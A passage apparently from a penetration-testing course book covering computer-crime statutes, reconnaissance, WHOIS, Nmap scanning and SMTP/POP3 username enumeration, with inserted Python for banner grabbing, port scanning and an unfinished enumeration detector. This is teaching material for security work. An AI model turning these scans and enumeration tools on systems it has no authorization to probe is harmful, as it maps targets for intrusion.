(B) In the case of an offense that occurs after a conviction for another offense under this section, a fine under this title or imprisonment for not more than 20 years, or both; and
(C) In either case, forfeiture to the United States of any personal property used or intended to be used to commit the offense.

Section 1030

Subsection (a)(1): having knowingly accessed a computer without authorization or exceeding authorized access, and by means of such conduct having obtained information that has been determined by the United States Government pursuant to an Executive order or statute to require protection against unauthorized disclosure for reasons of national defense or foreign
relations, or any restricted data, as defined in paragraph y of section 11 of the Atomic Energy Act of 1954, with reason to believe that such information so obtained could be used to the injury of the United States, or to the advantage of any foreign nation, willfully communicates, delivers, transmits, or causes to be communicated, delivered, or transmitted, or attempts to communicate, deliver, transmit or cause to be communicated, delivered, or transmitted the same to any person not entitled to receive it, or willfully retains the same and fails to deliver it to the officer or employee of the United States entitled to receive it;
(2) Intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains:
(A) information contained in a financial record of a financial institution, or of a card issuer as defined in section 1602(n) of title 15, or contained in a file of a consumer reporting agency on a consumer, as such terms are defined in the Fair Credit Reporting Act (15 U.S.C.
1681 et seq.);
(B) information from any department or agency of the United States; or
(C) information from any protected computer if the conduct involved an interstate or foreign communication;
(3) Intentionally, without authorization to access any nonpublic computer of a department or agency of the United States, accesses such a computer of that department or agency that is exclusively for the use of the Government of the United States or, in the case of a computer not exclusively for such use, is used by or for the Government of the United States and such conduct affects that use by or for the Government of the United States;
(4) Knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value, unless the object of the fraud and the thing obtained consists only of the use of the computer and the value of such use is not more than $5,000 in any 1-year period;
(5)(A)(i) Knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;
(ii) Intentionally accesses a protected computer without authorization, and as a result of such conduct, recklessly causes damage; or
(iii) Intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage; and
(5)(B) By conduct described in clause (i), (ii), or (iii) of subparagraph (A), caused (or, in the case of an attempted offense, would, if completed, have caused):
(i) loss to 1 or more persons during any 1-year period (and, for purposes of an investigation, prosecution, or other proceeding brought by the United States only, loss resulting from a related course of conduct affecting 1 or more other protected computers) aggregating at least $5,000 in value;
(ii) the modification or impairment, or potential modification or impairment, of the medical examination, diagnosis, treatment, or care of 1 or more individuals;
(iii) physical injury to any person;
(iv) a threat to public health or safety; or
(v) damage affecting a computer system used by or for a government entity in furtherance of the administration of justice, national defense, or national security;
(6) Knowingly and with intent to defraud traffics (as defined in section 1029) in any password or similar information through which a computer may be accessed without authorization, if:
(A) such trafficking affects interstate or foreign commerce; or
(B) such computer is used by or for the Government of the United States;
(7) With intent to extort from any person any money or other thing of value, transmits in interstate or foreign commerce any communication containing any threat to cause damage to a protected computer;

The Punishments:
(1)(A) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(1) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and
(B) a fine under this title or imprisonment for not more than twenty years, or both, in the case of an offense under subsection (a)(1) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense
punishable under this subparagraph;
(2)(A) except as provided in subparagraph (B), a fine under this title or imprisonment for not more than one year, or both, in the case of an offense under subsection (a)(2), (a)(3), (a)(5)(A)(iii), or (a)(6) of this section which does not occur after a conviction for
another offense under this section, or an attempt to commit an offense punishable under this subparagraph;
(B) a fine under this title or imprisonment for not more than 5 years, or both, in the case of an offense under subsection (a)(2), or an attempt to commit an offense punishable under this subparagraph, if:
(i) the offense was committed for purposes of commercial advantage or private financial gain;
(ii) the offense was committed in furtherance of any criminal or tortious act in violation of the Constitution or laws of the United States or of any State; or
(iii) the value of the information obtained exceeds $5,000;
(C) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(2), (a)(3) or (a)(6) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph;
(3)(A) a fine under this title or imprisonment for not more than five years, or both, in the case of an offense under subsection (a)(4) or (a)(7) of this section which does not occur after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph; and
(3)(B) a fine under this title or imprisonment for not more than ten years, or both, in the case of an offense under subsection (a)(4), (a)(5)(A)(iii), or (a)(7) of this section which occurs after a conviction for another offense under this section, or an attempt to commit an offense punishable under this subparagraph.

18 U.S.C. §1362

This law applies when:
• A person willfully injures or destroys any of the works, property, or material of any means of communication
• Maliciously obstructs, hinders, or delays the transmission of any communication
Punishment:
• A fine or imprisonment for not more than 10 years, or both
18 U.S.C. §2318 - Trafficking in counterfeit labels for phone records, copies of computer programs or computer program documentation or packaging, and copies of motion pictures or other audio visual works, and trafficking in counterfeit computer program documentation or packaging

This law applies when:
• A person knowingly traffics in a counterfeit label affixed or designed to be affixed
• Intentionally traffics in counterfeit documentation or packaging for a computer program
Punishment:
• A fine or imprisonment for not more than five years, or both

18 U.S.C. §2320 - Trademark Offenses: Trafficking in counterfeit goods or services

This law applies when:
• A person intentionally traffics or attempts to traffic in goods or services
• Knowingly uses a counterfeit mark
Punishment:
• A fine of not more than $2,000,000 or imprisonment for not more than 10 years, or both

18 U.S.C. §1831 - Trade Secret Offenses: Economic Espionage Law

This law applies when:
• A person knowingly steals or without authorization obtains a trade secret
• Without authorization copies or transmits a trade secret
• Receives, buys, or possesses a trade secret
Punishment:
• A fine of not more than $10,000,000

47 U.S.C. §605 - Unauthorized publication or use of communications

This law applies when:
• Receiving, assisting in receiving, transmitting, or assisting in transmitting, any interstate or foreign communication by wire or radio
• Intercepting any radio communication and divulging or publishing the existence, contents, substance, purport, effect, or meaning of such intercepted communication to any person
• Scrambling of Public Broadcasting Service programming
Punishment:
• A fine of not more than $2,000 or imprisonment for not more than 6 months, or both

More US Laws:
• Federal Managers Financial Integrity Act of 1982
• The Freedom of Information Act [5 U.S.C. §552]
• Federal Information Security Management Act (FISMA)
• The Privacy Act of 1974 [5 U.S.C. §552a]
• USA PATRIOT Act of 2001
• Government Paperwork Elimination Act (GPEA)

European Union:
• Substantive criminal law
  o Offences against the confidentiality, integrity and availability of computer data and systems
  o Illegal access: each Party shall adopt such legislative and other measures as may be necessary to establish as criminal offences under its domestic law, when committed intentionally, the access to the whole or any part of a computer system without right
  o Illegal interception
  o Data interference

UK:
• Computer Misuse Act 1990
• Police and Justice Act 2006
Foot-printing visiting Reconnaissance

Reconnaissance is the step in which the attacker attempts to retrieve as much information as possible about the target. Reconnaissance is truly an art and one of the most important stages of the attack process: it is the hacker's eyes on the court, and without it he must attack blindly, reducing the odds of success to a minimum.

Foot-Printing each Service Server Software Name and Version

Foot-Printing HTTP Servers

Getting the server type and disclosing internal information such as the local machine's internal name, its internal IP, the use of a proxy or a reverse proxy, etc. The following error page reveals that the server is Apache Tomcat, the machine's internal name, and that the error originated in the proxy component:

The following reveals the server's type and its exact version:
It is possible to change the values of the request parameters, retrieve application errors, and determine the operating system and the local path of the website's root folder:

It is possible to identify the server type, the development platform and the installed plugins by inspecting the returned HTTP headers and the supported HTTP methods.
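The header and error-page inspection described above, written out as an added example (this is not code from the book): it sends HEAD, OPTIONS and a request for a page that cannot exist, then pulls out the Server and X-Powered-By headers, the methods the server lists in Allow (the same OPTIONS probe the Enumeration chapter uses to list allowed HTTP methods), and any internal hostnames, private IP addresses and local file paths that leak from the error page. The regular expressions, the missing-page path and the sample Tomcat-behind-a-proxy response are assumptions constructed for the example.

```python
"""HTTP foot-printing helper (added example, not code from the book).

parse_response() works on raw response text, so it can be run on a captured
response without network access; probe() runs the three live requests.
Hostnames, IPs and paths in the sample below are constructed.
"""
import re
import socket
from typing import Dict, List

# RFC 1918 ranges plus loopback: such an address inside a response body is an
# internal address, not the one the client connected to.
PRIVATE_IP = re.compile(
    r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}"
    r"|192\.168\.\d{1,3}\.\d{1,3}"
    r"|127\.\d{1,3}\.\d{1,3}\.\d{1,3})\b")
# Windows drive paths and Unix paths as they appear in stack traces.
LOCAL_PATH = re.compile(
    r"(?:[A-Za-z]:\\(?:[^\\\s<>\"']+\\)+[^\\\s<>\"']*"
    r"|/(?:var|usr|home|opt|srv)/(?:[^/\s<>\"']+/)*[^/\s<>\"']*)")
# Hostnames under suffixes that are never routed on the public Internet.
INTERNAL_HOST = re.compile(
    r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.(?:local|lan|internal|corp|intranet)\b", re.I)
# Assumed path used to provoke the framework's own error page.
MISSING_PATH = "/this-page-does-not-exist-4f2c"


def parse_response(raw: str) -> Dict[str, object]:
    """Split one raw HTTP response into the fingerprint facts it leaks."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    allow = headers.get("allow", "")
    return {
        "status": lines[0] if lines else "",
        "server": headers.get("server"),
        "powered_by": headers.get("x-powered-by"),
        "methods": [m.strip().upper() for m in allow.split(",") if m.strip()],
        "internal_ips": sorted(set(PRIVATE_IP.findall(body))),
        "internal_hosts": sorted(set(INTERNAL_HOST.findall(body))),
        "local_paths": sorted(set(LOCAL_PATH.findall(body))),
        # Via / X-Forwarded-For headers, or "proxy" in the error text, point
        # at a proxy or reverse proxy in front of the real server.
        "proxy_hint": "via" in headers or "x-forwarded-for" in headers
                      or re.search(r"proxy", body, re.I) is not None,
    }


def fetch(host: str, port: int, request: str, timeout: float = 5.0) -> str:
    """Send one raw request and return the raw response (headers + body)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode("ascii"))
        chunks = []
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1", errors="replace")


def probe(host: str, port: int = 80) -> List[Dict[str, object]]:
    """Run the HEAD, OPTIONS and missing-page probes against a live server."""
    tail = f" HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    requests = ["HEAD /" + tail, "OPTIONS *" + tail, "GET " + MISSING_PATH + tail]
    return [parse_response(fetch(host, port, r)) for r in requests]


# Constructed sample (not real server output) shaped like the Tomcat-behind-a-
# proxy error page the text describes.
SAMPLE_ERROR_PAGE = (
    "HTTP/1.1 500 Internal Server Error\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "X-Powered-By: Servlet/2.5 JSP/2.1\r\n"
    "Allow: GET, HEAD, POST, OPTIONS, TRACE\r\n"
    "Via: 1.1 proxy01\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><h1>HTTP Status 500</h1>"
    "<p>mod_proxy: error reading status line from remote server "
    "appsrv01.corp (10.1.2.34)</p>"
    "<p>java.io.FileNotFoundException: "
    "C:\\tomcat\\webapps\\ROOT\\WEB-INF\\web.xml</p>"
    "</body></html>"
)

if __name__ == "__main__":
    import json
    print(json.dumps(parse_response(SAMPLE_ERROR_PAGE), indent=2))
```

Run it against a real target with probe(host); the missing-page request is the one most likely to trigger a verbose framework error, and the OPTIONS reply is where methods such as TRACE or PUT show up.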
Foot-Printing FTP Servers

The server's banner, which contains the server name and version, is exposed by default on most File Transfer Protocol (FTP) servers. This means that all an attacker has to do is connect to the server and read the first non-empty line of text. For example:

220-Serv-U FTP Server v6.4 for WinSock ready...
220-Welcome to XXXXX, home of Your FTP Server
220-
220 Local time is 13:36:08,

Foot-Printing Telnet Servers

Some telnet servers have banners revealing the name of the vendor, organization or product:
Some servers present a scary warning message, which may itself be used to identify the product or to recognize remotely that several machines belong to the same organization. For example:

Fingerprinting VoIP Servers: one of the most popular VoIP security assessment toolkits is SIPVicious.

Fingerprinting Products of Specific Vendors: it is possible to identify a specific vendor by the texts or messages that vendor commonly uses for titles, errors and authentication requests. For example, the web server on practically every Cisco product that uses "Basic Authentication" will, by default, present the message "level_15_access":
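Banner grabbing for FTP, telnet and similar services, combined with the vendor-string matching just described, as an added example (not the book's code): grab_banner() reads the greeting without sending anything and, for FTP and SMTP style replies, keeps reading "220-" continuation lines until the final "220 " line so the whole banner is captured; identify() then maps the banner, or an HTTP 401 response, onto a product using the strings quoted in this section. The signature table, the sample banners and the hostnames in them are constructed for the example.

```python
"""Banner grabbing plus a small signature table (added example, not code from
the book).  The signature strings are the ones this section quotes: the Serv-U
FTP greeting, the Sendmail greeting and the "level_15_access" string the book
reports for Cisco Basic Authentication.  Sample banners are constructed.
"""
import re
import socket
from typing import List, Optional, Tuple

# A final reply line is "<3 digits><space>"; "<3 digits>-" means more follows.
FINAL_LINE = re.compile(r"^\d{3} ")

# (regex over the banner or HTTP response, label with version placeholders).
# First match wins, so the most specific patterns go first.
SIGNATURES: List[Tuple[str, str]] = [
    (r"Serv-U FTP Server v([\d.]+)", "Serv-U FTP Server {0}"),
    (r"ESMTP Sendmail ([\d.]+)", "Sendmail {0}"),
    (r'realm="level_15_access"', "Cisco (Basic Authentication realm level_15_access)"),
    (r"Apache Tomcat/([\d.]+)", "Apache Tomcat {0}"),
]


def split_reply(raw: str) -> Tuple[List[str], bool]:
    """Return the non-empty reply lines and whether the last one is final."""
    lines = [l for l in raw.replace("\r\n", "\n").split("\n") if l]
    complete = bool(lines) and FINAL_LINE.match(lines[-1]) is not None
    return lines, complete


def grab_banner(host: str, port: int, timeout: float = 5.0,
                limit: int = 4096) -> str:
    """Read whatever the service says first, without sending anything."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        while len(data) < limit:
            try:
                chunk = s.recv(1024)
            except socket.timeout:
                break                      # silent service (e.g. HTTP): done
            if not chunk:
                break                      # server closed the connection
            data += chunk
            _, complete = split_reply(data.decode("latin-1"))
            if complete and data.endswith(b"\n"):
                break                      # final "NNN " line seen
    return data.decode("latin-1", errors="replace")


def first_line(banner: str) -> str:
    """The first non-empty line: usually enough for product and version."""
    lines, _ = split_reply(banner)
    return lines[0] if lines else ""


def identify(text: str) -> Optional[str]:
    """Map a banner (or an HTTP response) onto a product label, or None."""
    for pattern, label in SIGNATURES:
        m = re.search(pattern, text)
        if m:
            return label.format(*m.groups())
    return None


# Constructed samples modelled on the banners quoted in the text.
SAMPLE_SERVU = ("220-Serv-U FTP Server v6.4 for WinSock ready...\r\n"
                "220-Welcome to ftp.example.net, home of Your FTP Server\r\n"
                "220-\r\n"
                "220 Local time is 13:36:08,\r\n")
SAMPLE_SENDMAIL = "220 myhost ESMTP Sendmail 8.9.3\r\n"
SAMPLE_CISCO_401 = ("HTTP/1.1 401 Unauthorized\r\n"
                    'WWW-Authenticate: Basic realm="level_15_access"\r\n\r\n')

if __name__ == "__main__":
    for sample in (SAMPLE_SERVU, SAMPLE_SENDMAIL, SAMPLE_CISCO_401):
        print(repr(first_line(sample)), "->", identify(sample))
```

Against a live host, identify(grab_banner(host, 21)) does the FTP case; for telnet the same call works because the login prompt arrives unsolicited, while an HTTP server stays silent until asked, which is why grab_banner() gives up on a receive timeout rather than waiting forever.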
Using Zenmap (the Nmap GUI) to fingerprint the exact product type and version:

Scanning for a service listening on TCP port 990 finds a brute-forceable Check Point firewall VPN:
On some installations it is reconfigured to listen on port 80:

Scanning for "Check Point Certificate Services" listening on TCP port 18264 has always proved a reliable way of finding Check Point firewalls:
Identifying Check Point VPN-1 Edge Portal

WHOIS

Every IP address and domain on the Internet is registered to someone. It is possible to query the public databases and retrieve information about the owner of an IP or domain. Querying IPs is usually called "IP WHOIS" or "Inet-WHOIS", and querying domain names is called "Domain WHOIS" or "Inic-WHOIS". An attacker can retrieve network information with an information gathering tool such as Dmitry:
Where the Inic-WHOIS might be masked, private, proxied or censored:

the Inet-WHOIS might not be:
Or by using a free public online service such as:
http://www.dnsstuff.com
http://www.dnstools.com
http://www.centralops.net

For example:
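The two kinds of WHOIS lookup described above, done over the bare WHOIS protocol (RFC 3912) rather than through Dmitry or a web front end, as an added example that is not the book's code: one query line ending in CRLF on TCP port 43, after which the server writes its answer and closes. parse_record() turns the free-form reply into key/value pairs, referral() follows the line a registry uses to hand an address or domain over to the registry that actually holds it, and privacy_masked() checks the point the section makes: the domain (Inic) record may be proxied while the netblock (Inet) record is not. The sample records are constructed; whois.iana.org, whois.arin.net and whois.verisign-grs.com are real servers, everything else is made up.

```python
"""WHOIS over RFC 3912 with referral following (added example, not code from
the book and not Dmitry).  Sample records below are constructed.
"""
import re
import socket
from typing import Dict, List, Optional

WHOIS_PORT = 43
DOMAIN_WHOIS = "whois.iana.org"    # refers domains to the TLD registry
INET_WHOIS = "whois.arin.net"      # refers IPs to the right RIR if not ARIN

KV = re.compile(r"^\s*([A-Za-z][A-Za-z0-9 /_-]*?)\s*:\s*(.*?)\s*$")
PRIVACY = re.compile(r"redacted|privacy|proxy|whoisguard|protected", re.I)
REGISTRANT_KEYS = ("registrant name", "registrant organization", "registrant email")


def whois_query(query: str, server: str, timeout: float = 10.0) -> str:
    """One raw WHOIS exchange; returns the server's full text."""
    with socket.create_connection((server, WHOIS_PORT), timeout=timeout) as s:
        s.sendall((query + "\r\n").encode("ascii"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_record(text: str) -> Dict[str, List[str]]:
    """Collect 'Key: value' lines, skipping '%' and '#' comment lines.
    Keys repeat in real records, so every key maps to a list of values."""
    record: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("%", "#")):
            continue
        m = KV.match(line)
        if m:
            record.setdefault(m.group(1).lower(), []).append(m.group(2))
    return record


def referral(record: Dict[str, List[str]]) -> Optional[str]:
    """'ReferralServer: whois://whois.ripe.net' (ARIN) or 'refer: host'
    (IANA) -> the host to ask next, or None."""
    for key in ("referralserver", "refer"):
        for value in record.get(key, []):
            return value.replace("whois://", "").split(":")[0].strip()
    return None


def privacy_masked(record: Dict[str, List[str]]) -> bool:
    """True when every registrant field is a proxy/redaction placeholder."""
    values = [v for k in REGISTRANT_KEYS for v in record.get(k, [])]
    return bool(values) and all(PRIVACY.search(v) for v in values)


def lookup(query: str, inet: bool) -> Dict[str, List[str]]:
    """Inet or Inic lookup, following one referral if the registry gives one."""
    record = parse_record(whois_query(query, INET_WHOIS if inet else DOMAIN_WHOIS))
    nxt = referral(record)
    return parse_record(whois_query(query, nxt)) if nxt else record


# Constructed sample records (not real registry output).
SAMPLE_DOMAIN = """\
% Constructed example of a privacy-proxied domain record
Domain Name: EXAMPLE-TARGET.COM
Registrar: Some Registrar, Inc.
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy Protect, LLC
Registrant Email: contact@privacyprotect.example
"""
SAMPLE_INET = """\
# Constructed example of an unmasked netblock record with a referral
NetRange:       203.0.113.0 - 203.0.113.255
CIDR:           203.0.113.0/24
NetName:        TARGET-HOSTING
OrgName:        Target Hosting Ltd
OrgTechEmail:   noc@target-hosting.example
ReferralServer: whois://whois.ripe.net
"""

if __name__ == "__main__":
    print(privacy_masked(parse_record(SAMPLE_DOMAIN)))   # True
    print(referral(parse_record(SAMPLE_INET)))            # whois.ripe.net
```

lookup("example.com", inet=False) asks IANA and follows its refer: line to the TLD registry; lookup("203.0.113.1", inet=True) asks ARIN and follows ReferralServer: when the block belongs to another RIR. When the domain record comes back masked, the netblock record for the site's IP is the place to look for the hosting organisation and its abuse or technical contacts.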
Google Hacking

What is Google hacking

Finding Old Vulnerable Web Pages / Fast & Passive Web Crawling/Spidering
Finding Login Interfaces
Finding Exploitable Vulnerable Web Systems by Signature

Choosing a public exploit:
Finding a vulnerable website

Finding a vulnerable machine to use as the exploitation target can be done by using Google to find websites containing the same long path or directory tree:
Alternatively, the vulnerable website can be found by using the "Powered by" signature of open source projects:
Verifying the vulnerability exists
Exploiting the Vulnerability

Opening a free hosting account
Local File Inclusion Example:
Finding Cameras
Finding Password Files
Scanning and Scanning Definition

The term scanning refers to the phase of discovering the machines, protocols and ports that exist in an accessible computer network. Port scanning is an art and a crucial part of the reconnaissance process. Many junior information security personnel make mistakes during the scanning process and fail to discover certain machines and services, which results in vulnerabilities that are never found and therefore never repaired. The common scanning concept relies on the idea that a certain service listens on a default port number, so by successfully connecting to that port it is reasonable to assume that it is the expected service. To positively identify the true service listening on a port, the scanner sends the "hello message" of every known protocol in its database until it gets a response in the same protocol. The most famous scanner is Nmap, which has been under development since 1997 and supports practically every known port scanning method. The two most common port scanning methods are the SYN scan and the Connect scan.

• Connect Scan: nmap -Pn --open -v -A -p1-65535 -sT <ip>
  o Slower
  o 100% reliable (if you can connect, then the port is publicly open)
  o Allows inquiring into the true underlying service
  o Can be implemented in any programming language (even JavaScript)
• SYN Scan: nmap -Pn --open -v -A -p1-65535 -sS <ip>
  o Fastest scanning method
  o Sends only one packet for each port
  o Requires raw-socket access (root on Unix, a packet-capture driver such as WinPcap on Windows)
  o Might trigger a false alarm of a "SYN flood" attack in firewalls/IDS/IPS
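The Connect scan from the list above, written by hand as an added example (not code from the book and not Nmap): a full three-way handshake per port, so no raw sockets or capture driver are needed and every port reported open really accepted a connection; after connecting it reads whatever greeting the service sends, which is the first step of identifying the true underlying service. demo_local() starts a throwaway listener on an ephemeral port of 127.0.0.1 and scans the ports around it, so the code can be exercised without a target; the banner it serves and the port span are assumptions.

```python
"""Threaded TCP connect scan with a first-line banner read (added example,
not code from the book or from Nmap).
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, List, Optional


def probe_port(host: str, port: int, timeout: float = 1.0) -> Optional[str]:
    """Return the greeting (possibly '') if the port accepts a connection,
    or None when it is closed or filtered."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(256).decode("latin-1", errors="replace").strip()
            except (socket.timeout, ConnectionResetError):
                return ""              # open, but waits for the client to talk
    except OSError:
        return None                    # refused, timed out, unreachable


def connect_scan(host: str, ports: List[int], timeout: float = 1.0,
                 workers: int = 64) -> Dict[int, str]:
    """Probe every port concurrently; returns {open_port: banner}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, probe_port(host, p, timeout)), ports))
    return {p: banner for p, banner in results if banner is not None}


def demo_local(span: int = 5) -> Dict[str, object]:
    """Open a listener that greets with a constructed banner, scan the ports
    around it, and return the scan result together with the port used."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))            # let the OS pick a free port
    listener.listen(5)
    listener.settimeout(5.0)
    port = listener.getsockname()[1]

    def serve() -> None:
        try:
            while True:
                conn, _ = listener.accept()
                conn.sendall(b"220 demo-ftp ready\r\n")   # constructed banner
                conn.close()
        except OSError:
            pass                                # listener closed: stop

    threading.Thread(target=serve, daemon=True).start()
    ports = list(range(max(1, port - span), port + span + 1))
    found = connect_scan("127.0.0.1", ports, timeout=0.5, workers=len(ports))
    listener.close()
    return {"port": port, "open": found}


if __name__ == "__main__":
    result = demo_local()
    for p, banner in sorted(result["open"].items()):
        print(f"{p}/tcp open  {banner!r}")
```

connect_scan(host, range(1, 65536)) is the full-range equivalent of the -p1-65535 -sT command; expect it to be slower than a SYN scan because each open port costs a complete handshake plus the banner timeout, and expect every connection to appear in the target's service logs, which a SYN scan does not produce.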
Enumeration

Overview of System Hacking Cycle

Enumerating the allowed HTTP Methods on a Web Server:

Enumerating Usernames

Using Google

Exposed Configuration Files

Company Email Addresses:
In most cases, a user’s email address is also his username inside the company, especially when Single Sign-On (SSO) is implemented.
SMTP Enumeration (VRFY, EXPN, RCPT TO, NDR)

Using the SMTP VRFY Command
It is possible to enumerate the existing users and email aliases using the official SMTP VRFY request. The process can be automated with a simple script/tool such as “smtp-user-enum.pl”. The output below shows how the SMTP server responds differently to VRFY requests for valid and invalid users. It is recommended that a manual check like the following is carried out before running smtp-user-enum; obviously the tool won't work if the server doesn't respond differently to requests for valid and invalid users.

$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
VRFY no_such
550 no_such... User unknown
VRFY root
250 Super-User <root@myhost>

To use smtp-user-enum to enumerate valid usernames using the VRFY command, first prepare a list of usernames (users.txt) and run the tool as follows:

$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1
Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 25
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Sun Jan 21 18:01:50 2011 #########
root@10.0.0.1: Exists
bin@10.0.0.1: Exists
daemon@10.0.0.1: Exists
lp@10.0.0.1: Exists
adm@10.0.0.1: Exists
uucp@10.0.0.1: Exists
postmaster@10.0.0.1: Exists
nobody@10.0.0.1: Exists
ftp@10.0.0.1: Exists
######## Scan completed at Sun Jan 21 18:01:50 2011 #########
9 results.

47 queries in 1 seconds (47.0 queries / sec)

It's worth noting that postmaster is not actually a valid OS-level user account - it's a mail alias.

Using the SMTP EXPN Command
The output below shows how the SMTP server responds differently to EXPN requests for valid and invalid users.

$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
EXPN no_such
550 no_such... User unknown
EXPN root
250 Super-User <root@myhost>

To use smtp-user-enum to enumerate valid usernames using the EXPN command, first prepare a list of usernames (users.txt) and run the tool as follows (unsurprisingly, we get the same results as above):

$ smtp-user-enum.pl -M EXPN -U users.txt -t 10.0.0.1
Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... EXPN
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 25
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Sun Jan 21 18:01:50 2011 #########
root@10.0.0.1: Exists
bin@10.0.0.1: Exists
daemon@10.0.0.1: Exists
lp@10.0.0.1: Exists
adm@10.0.0.1: Exists
uucp@10.0.0.1: Exists
postmaster@10.0.0.1: Exists
nobody@10.0.0.1: Exists
ftp@10.0.0.1: Exists
######## Scan completed at Sun Jan 21 18:01:50 2011 #########
9 results.

47 queries in 1 seconds (47.0 queries / sec)

Using the SMTP RCPT TO Command
The output below shows how the SMTP server responds differently to RCPT TO requests for valid and invalid users. This is often the most useful technique, as VRFY and EXPN are often disabled to prevent username enumeration.

$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:root
250 root... Sender ok
RCPT TO: no_such
550 no_such... User unknown
RCPT TO:root
250 root... Recipient ok

Non-Delivery Response (NDR)
Mail servers are friendly and attempt to provide users with the best service they can. Therefore, when someone sends an email to a non-existing user, the mail server notifies him that this user doesn’t exist, so he can correct his typing error or call that person to get his new account name. To enumerate usernames using NDRs, the attacker simply sends an email to an account on a certain domain: if the account exists, the attacker gets no notification; if it doesn’t exist, he gets an NDR email saying that this account doesn’t exist.

POP3 Enumeration
The Post Office Protocol (POP3) is used by users to read their emails. In order for a user to get his mailbox contents, the server requires the user to identify himself in two sequential steps. In the first step the user sends the keyword “USER” followed by a space and his username. In the second step the user sends the keyword “PASS” followed by a space and his password in clear text.
Some POP3 servers were implemented in such a way that they reply with one error message when the user exists and a different one when he doesn’t. Select a random list of names and passwords, connect to the POP3 server with a telnet client of your choice, and try to authenticate. The following is an example of a POP3 server listening on an AS/400 machine:
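On the monitoring side, the SMTP probes shown above leave a recognisable trace: VRFY and EXPN play no part in normal mail delivery, and RCPT TO enumeration appears as one client whose recipients are mostly rejected with 550. The following is an added detection example, not code from the book or from smtp-user-enum; the one-line-per-record log format, the sample sessions and the thresholds are constructed for it.

```python
"""Added example, not from the book: flag SMTP username-enumeration sessions.

Log format (constructed for this example): one record per line,
"<client-ip> <C|S> <text>", where C is a client command and S is the
server reply that followed it. Real MTA logs would need their own parser.
"""
from collections import defaultdict

PROBE_COMMANDS = {"VRFY", "EXPN"}

# Constructed sessions: the probing client from the telnet transcripts above,
# a client walking a username list with RCPT TO, and a legitimate sender.
SAMPLE_LOG = [
    "10.0.0.99 C HELO x",
    "10.0.0.99 S 250 myhost Hello [10.0.0.99], pleased to meet you",
    "10.0.0.99 C VRFY no_such",
    "10.0.0.99 S 550 no_such... User unknown",
    "10.0.0.99 C VRFY root",
    "10.0.0.99 S 250 Super-User <root@myhost>",
    "10.0.0.99 C EXPN staff",
    "10.0.0.99 S 550 staff... User unknown",
    "10.0.0.200 C MAIL FROM:<partner@example.net>",
    "10.0.0.200 S 250 partner@example.net... Sender ok",
    "10.0.0.200 C RCPT TO:<bob@myhost>",
    "10.0.0.200 S 250 bob@myhost... Recipient ok",
]
for n in range(12):
    SAMPLE_LOG += [
        f"10.0.0.55 C RCPT TO:<user{n}@myhost>",
        f"10.0.0.55 S 550 user{n}@myhost... User unknown",
    ]


def analyze_sessions(lines, min_rcpt=5, reject_ratio=0.5):
    """Per client: probe-command count, RCPT TO count, 5xx rejects and a verdict.

    A client is suspicious if it issued any VRFY/EXPN, or if it sent at least
    min_rcpt RCPT TO commands of which reject_ratio or more were refused.
    Thresholds are assumptions for the example.
    """
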